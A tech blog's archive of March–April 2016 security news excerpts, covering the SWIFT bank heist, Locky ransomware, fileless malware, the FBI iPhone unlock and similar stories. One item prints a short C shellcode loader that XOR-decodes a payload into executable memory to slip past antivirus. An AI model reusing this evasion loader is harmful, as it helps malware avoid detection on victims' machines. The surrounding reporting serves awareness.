Doug Vitale Tech Blog

March – April 2016 News Archive

Hackers’ $81 Million Sneak Attack on World Banking

New York Times, 30 Apr 2016 – What enabled one of the most brazen digital bank heists ever is a ubiquitous and highly trusted international bank messaging system called Swift. Swift — the Society for Worldwide Interbank Financial Telecommunication — is billed as a supersecure system that banks use to authorize payments from one account to another. But last week, for the first time since hackers captured $81 million from Bangladesh’s central bank in February, Swift acknowledged that the thieves have tried to carry out similar heists at other banks on its network by sneaking into the beating heart of the global banking system. [More]

Hitting back at hackers

The Australian, 29 Apr 2016 – Last week the Prime Minister Malcolm Turnbull launched a new cyber security strategy to meet “the dual challenges of the digital age — advancing and protecting our interests online” and announced $230 million in government funding for 33 new initiatives that would result in 100 new jobs to “boost the government’s cybersecurity capacity and capabilities.” [More]

PCI Standard Adds Multi-Factor Authentication Requirements

InfoSecurity, 29 Apr 2016 – One significant change in PCI DSS 3.2 is that it includes multi-factor authentication as a requirement for any personnel with administrative access into environments handling card data. Previously this requirement applied only to remote access from untrusted networks. [More]

New Attack Technique Hides Spread of RATs in Asia

TechNewsWorld, 27 Apr 2016 – SentinelOne last week announced that it has detected a technique being used in Asia to infect systems with remote access Trojans that ensures that the payload remains in memory throughout its execution and doesn’t touch the victim’s computer disk in an unencrypted state. Attackers remain hidden from antivirus technologies and next-generation technologies that focus only on file-based threats, according to SentinelOne. The samples analyzed also can detect the presence of a virtual machine, preventing them from being analyzed in a network sandbox. [More]

Ransomware is the future

CSO Online, 19 Apr 2016 – If you’ve been keeping up with the news lately, you’ve probably heard about the explosion of the ransomware strain known as Locky. Locky is a very aggressive type of malware that encrypts files on a victim’s computers and crawls through network shares that are accessible to the victim. It is typically delivered by macros inside of Microsoft Word documents sent through email. When recipients open the Word document, they are prompted to enable macros, and when they do, the ransomware embedded in the macro executes and infects the victim’s computer. [More]

Why Cloud Security is essential for the success of Internet of Things

CloudWedge, 18 Apr 2016 – The integration of Internet of Things (IoT) into daily lives is a hot topic for the consumer market with smart home appliances, smart phones and wearables all communicating with each other to create one network of connected systems. In a similar fashion the business-to-business (B2B) application of IoT technology presents a huge potential to change the way companies operate and create products. Not limited to large organizations, IoT can be found in many sectors, including government (smart parking, lighting and watering, environmental monitoring, traffic management), manufacturing (supply chain optimization, robotics, RFID and logistics, industrial control systems), healthcare (bedside monitoring, telemedicine, implantable devices), amongst others. [More]

Hyping vulnerabilities is no longer helping awareness

TechCrunch, 11 Apr 2016 – It used to be a vulnerability was disclosed, a few people who paid attention to such things blogged about it, patches were made, and we went about our day. Then Heartbleed happened. It was a big deal. It disrupted productivity, caused breaches and shone the light on the fact that open source components are increasing risk in the application layer. Major media outlets covered the news, and the public began to better understand the need for application security. [More]

A Whole Lot of Nitwits Will Plug a Random USB Into Their Computer

Motherboard, 6 Apr 2016 – Using booby-trapped USB flash drives is a classic hacker technique. But how effective is it really? A group of researchers at the University of Illinois decided to find out, dropping 297 USB sticks on the school’s Urbana-Champaign campus last year. As it turns out, it really works. [More]

Server software poses soft target for ransomware

ComputerWorld, 5 Apr 2016 – An alternate method for infecting computers with ransomware signals a shift in tactics by cybercriminals that could put businesses at greater risk, according to Symantec. A type of ransomware called Samsam has been infecting organizations but is not installed in the usual way. [More]

5 Ways Cyber Experts Think the FBI Might Have Hacked the iPhone

IEEE Spectrum, 5 Apr 2016 – Last week, the FBI announced that it had, with the help of a third party, successfully broken into the passcode-protected iPhone 5C owned by San Bernardino shooter Syed Farook. The agency hasn’t named its accomplice nor has it revealed how it gained access to the iPhone’s contents. [More]

Malware Attacks On Hospitals Put Patients At Risk

NPR, 1 Apr 2016 – Malware attacks have left the 14 hospitals — 10 of which are part of the MedStar hospital group — unable to access patient data and, in some cases, having to turn patients away. [More]

Execs: We’re not responsible for cybersecurity

Yahoo Finance, 1 Apr 2016 – More than 90 percent of corporate executives said they cannot read a cybersecurity report and are not prepared to handle a major attack, according to a new survey. More distressing is that 40 percent of executives said they don’t feel responsible for the repercussions of hackings, said Dave Damato, chief security officer at Tanium, which commissioned the survey with the Nasdaq. [More]

New wireless tech promises password-free Wi-Fi

NetworkWorld, 31 Mar 2016 – New wireless technology developed by researchers at MIT’s Computer Science and Artificial Intelligence Lab promises to kill the Wi-Fi password at last. Dubbed Chronos, the new system enables a single Wi-Fi access point to locate users to within tens of centimeters without relying on any external sensors. What that means is that it could figure out where people are in a home or office and adjust heating and cooling accordingly. It could also enable a small cafe to better restrict its free Wi-Fi to paying customers. [More]

71% Of People Globally Think The Dark Net Should Be Shut Down

Forbes, 31 Mar 2016 – More than 70% of people globally think that the “dark net” should be shut down, according to a new survey. The Center for International Governance Innovation (CIGI), a Canadian think tank, surveyed more than 24,000 Internet users in two dozen countries between November 20, 2015 and December 4, 2015. It found that worldwide, popular opinion is against the dark net and services that allow people to maintain anonymity in their online activity. [More]

Linux at 25: Q&A With Linus Torvalds

IEEE Spectrum, 29 Mar 2016 – Linus Torvalds created the original core of the Linux operating system in 1991 as a computer science student at the University of Helsinki in Finland. Linux rapidly grew into a full-featured operating system that can now be found running smartphones, servers, and all kinds of gadgets. In this e-mail interview, Torvalds reflects on the last quarter century and what the next 25 years might bring. [More]

EC-Council website caught spreading crypto ransomware

ArsTechnica, 24 Mar 2016 – Like so many drive-by attack campaigns, the one hitting the EC-Council is designed to be vexingly hard for researchers to replicate. It targets only visitors using Internet Explorer and then only when they come to the site from Google, Bing, or another search engine. Even when these conditions are met, people from certain IP addresses—say those in certain geographic locales—are also spared. The EC-Council pages of those who aren’t spared then receive embedded code that redirects the browser to a chain of malicious domains that host the Angler exploits. [More]

Ransomware is the future

BlueSoul, 18 Mar 2016 – Ransomware-as-a-service is a real thing you can buy, some variants have live chat support to receive payment, and we routinely see new versions with bugfixes and feature-adds. One of the last major flaws in ransomware, the inability to enumerate non-mapped network shares, was overcome in the latest Locky build that calls WNetOpenEnum() to attempt to traverse every share on the network. [More]

Documents with malicious macros deliver fileless malware

ComputerWorld, 14 Mar 2016 – Spammed Word documents with malicious macros have become a popular method of infecting computers over the past few months. Attackers are now taking it one step further by using such documents to deliver fileless malware that gets loaded directly in the computer’s memory. Security researchers from Palo Alto Networks analyzed a recent attack campaign that pushed spam emails with malicious Word documents to business email addresses from the U.S., Canada and Europe. The emails contained the recipients’ names as well as specific information about the companies they worked for, which is not typical of widespread spam campaigns. [More]

Bypassing Antivirus With Ten Lines of Code

Attactics, 14 Mar 2016 – #include <windows.h>
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
} [More]

Ransomware Rising – Criakl, OSX, and others

PhishMe, 10 Mar 2016 – Over the last few months, the Phishing Intelligence team has observed a huge increase of ransomware. Many attackers are starting to experiment with ransomware as an alternative to quickly monetize. Dridex has employed a new family of ransomware named Locky, which is a pretty drastic shift in what this group is known for doing. We’re even seeing attackers go after OSX with ransomware, something that was once thought to be immune from malware, however there were nearly 6,500 users who downloaded the compromised BitTorrent client. [More]

Locky ransomware activity ticks up

Network World, 9 Mar 2016 – Locky, a new family of ransomware that emerged in the last few weeks, has quickly made a mark for itself. Computer security companies say it has become a commonly seen type of ransomware, which is used to hold a computer’s files hostage pending a ransom payment. Trustwave’s SpiderLabs said on Wednesday that 18 percent of 4 million spam messages it collected in the last week were ransomware-related, including many linked to Locky. [More]

The human firewall cannot be fixed, says McAfee CTO

CSO Online, 9 Mar 2016 – How would you fix the human firewall?
Well, you cannot. We each have subconscious levers that can be used to influence. These are what criminals use within modern spear phishing emails, and they are intended to tap into our subconscious to influence our behaviors. What I find remarkable is that these tricks are being used within emails bombarding our inboxes; in fact it’s not just email, they are coming in via multiple channels. [More]

First Fully Functional Mac Ransomware Contained Before It Could Cause Havoc

Dark Reading, 7 Mar 2016 – The first fully functional ransomware for Mac OS X has been discovered in the wild, but was contained before it did damage. The new ransomware, “KeRanger,” found by Palo Alto Networks’ Unit 42, is completely capable. KeRanger bypasses Apple’s Gatekeeper — the tool that prevents unsigned code from running on Mac operating systems — by piggy-backing on an infected version of Transmission, an open-source BitTorrent client, which is signed with a valid Mac application developer’s certificate. [More]

Data Is a Toxic Asset

Schneier, 4 Mar 2016 – Thefts of personal information aren’t unusual. Every week, thieves break into networks and steal data about people, often tens of millions at a time. Most of the time it’s information that’s needed to commit fraud, as happened in 2015 to Experian and the IRS. Sometimes it’s stolen for purposes of embarrassment or coercion, as in the 2015 cases of Ashley Madison and the US Office of Personnel Management. The latter exposed highly sensitive personal data that affects security of millions of government employees, probably to the Chinese. Always it’s personal information about us, information that we shared with the expectation that the recipients would keep it secret. And in every case, they did not. [More]

Treat Data Security Like Firefighting

Digg, 3 Mar 2016 – Warning to enterprises: Patch all Linux systems immediately against the flaw in the GNU C Library – “glibc” – which affects millions of devices, and which could allow hackers to remotely exploit code on all vulnerable systems. That’s the advice from Dan Kaminsky, chief scientist at anti-malware firm White Ops. [More]

Why encryption isn’t evil

Certification Mag, 2 Mar 2016 – In the past few months, deadly terrorist attacks rocked San Bernardino, CA and shattered the French capital city of Paris. The technical investigation following both incidents largely focused on questions regarding digital communication and coordination among the attackers using standard encryption protocols to avoid eavesdropping by law enforcement and intelligence organizations. Encryption is already a hot-button topic in cybersecurity. These dramatic breaches of public safety have sparked a worldwide debate regarding the widespread use of encryption, and its role in barring government access to private communications. There’s one bottom line question: Is encryption a sinister tool being used to serve nefarious ends? [More]

Pentagon Launches the Feds’ First ‘Bug Bounty’ for Hackers

Digg, 2 Mar 2016 – On Wednesday the Department of Defense announced that it’s launching a “Hack the Pentagon” pilot program to pay independent security researchers who disclose bugs in the Pentagon’s public-facing websites, and to eventually roll out the initiative to the DoD’s less public targets including its applications and even its networks. [More]

The IRS is using a system to protect victims of a hack—and it was just hacked

Quartz, 1 Mar 2016 – To protect the victims of the data breach from further harm, the IRS provided them with “Identity Protection PINs”. The PINs are secret codes which those taxpayers now have to put on all of their tax returns, or the IRS won’t accept them. For this master plan to work, though, the IRS would also have to keep the PINs secret. Unfortunately, it seems the agency is having some trouble with that. [More]

Written by Doug Vitale

May 21, 2016 at 10:13 PM